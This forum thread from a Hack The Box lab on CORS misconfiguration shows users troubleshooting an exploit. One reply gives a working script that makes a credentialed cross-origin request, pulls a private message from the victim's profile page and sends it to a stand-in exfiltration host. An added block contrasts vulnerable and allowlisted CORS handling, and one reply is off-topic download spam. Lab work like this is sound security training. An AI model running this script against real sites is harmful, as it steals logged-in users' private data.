Advanced XSS and CSRF Exploitation - CORS Misconfiguration

Hi, in the CORS Misconfiguration section of the Advanced XSS and CSRF Exploitation module, after delivering the exploit to the victim nothing happens. I have also tested with a single script tag and location set to my IP and port 8000, listening with nc -nvlp 8000, but I didn’t receive any request. If I try visiting the exploitserver.htb/exploit page I receive my own request. Also, if I visit with the correct exploit with an xhr request to the profile.php page of vulnerablesite.htb, the request does not include the PHPSESSID cookie and I receive a 302 redirect.

Thanks in advance for the help.

You can go to ApkLoky, I think you should download mods from there.

I am having the exact same issue.

Okay, this was a funny one! Something that helped me was running the different scripts in the console and retrieving the exact error messages from it.

At first, I was trying to exfiltrate the entire response, but of course, there’s a section that mentions you can break the request by doing that.

And just in case, I did not need to use netcat or any other tool; the ones provided by HTB are the necessary ones.

So once it is working and you know that the CSRF is exploiting you first, you can try to figure out how to fix it and how to retrieve the right information.

Hope this helps, all the best!


What script did you end up using? Because I’ve tried all the ones on the guide and I don’t get any luck.

Hey spainpromise! Long live Spain, damn it!

So I did this:

<script>
  var xhr = new XMLHttpRequest();
  xhr.open('POST', 'https://vulnerablesite.htb:32946/profile.php', true);
  // send the victim's cookies with the cross-origin request
  xhr.withCredentials = true;
  xhr.onload = () => {
    // parse the response
    var doc = new DOMParser().parseFromString(xhr.response, 'text/html');

    // exfiltrate only the interesting element
    var msg = encodeURIComponent(doc.getElementById('private-message').innerHTML);
    location = 'https://exfiltrate.htb:32946/log?data=' + btoa(msg);
  };
  xhr.send();
</script>

For the rest I guess you won’t need anything else! All the best, mate
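To make clear why the credentialed cross-origin read in the script above only succeeds when the server mishandles CORS, here is an added example (not from this thread or the HTB lab) that models the server's header decision and the browser's read check; the hostnames are the thread's own, the allowlist and the helper names are assumptions.

```javascript
// Added example: vulnerable vs. hardened CORS handling for a credentialed
// request (xhr.withCredentials = true), plus the browser-side read rule.

// Vulnerable pattern: reflect whatever Origin the request carries and also
// allow credentials. Any origin that can run script in a logged-in victim's
// browser can then read the response of profile.php.
function corsHeadersReflecting(origin) {
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened pattern: only an exact allowlisted origin gets a credentialed
// grant; anything else gets no ACAO header, so the browser blocks the read.
// Exact matching also rejects suffix tricks like vulnerablesite.htb.evil.example.
// The allowlist content is an assumption for illustration.
const ALLOWED_ORIGINS = new Set(['https://vulnerablesite.htb:32946']);

function corsHeadersAllowlisted(origin) {
  if (ALLOWED_ORIGINS.has(origin)) {
    return {
      'Access-Control-Allow-Origin': origin,
      'Access-Control-Allow-Credentials': 'true',
      'Vary': 'Origin', // keep caches from serving one origin's grant to another
    };
  }
  return {};
}

// Browser-side rule (simplified from the Fetch standard): a credentialed
// response is readable only if ACAO equals the requesting origin exactly
// ("*" is rejected when credentials are included) and ACAC is "true".
function responseReadable(requestOrigin, headers) {
  const acao = headers['Access-Control-Allow-Origin'];
  const acac = headers['Access-Control-Allow-Credentials'];
  return acao === requestOrigin && acao !== '*' && acac === 'true';
}

// Same attacker-controlled origin against both server behaviours.
function demo() {
  const attacker = 'https://exploitserver.htb';
  return {
    reflecting: responseReadable(attacker, corsHeadersReflecting(attacker)),
    allowlisted: responseReadable(attacker, corsHeadersAllowlisted(attacker)),
  };
}
```

Running demo() gives reflecting: true and allowlisted: false, which is the whole difference between the lab's misconfiguration and a correct CORS policy.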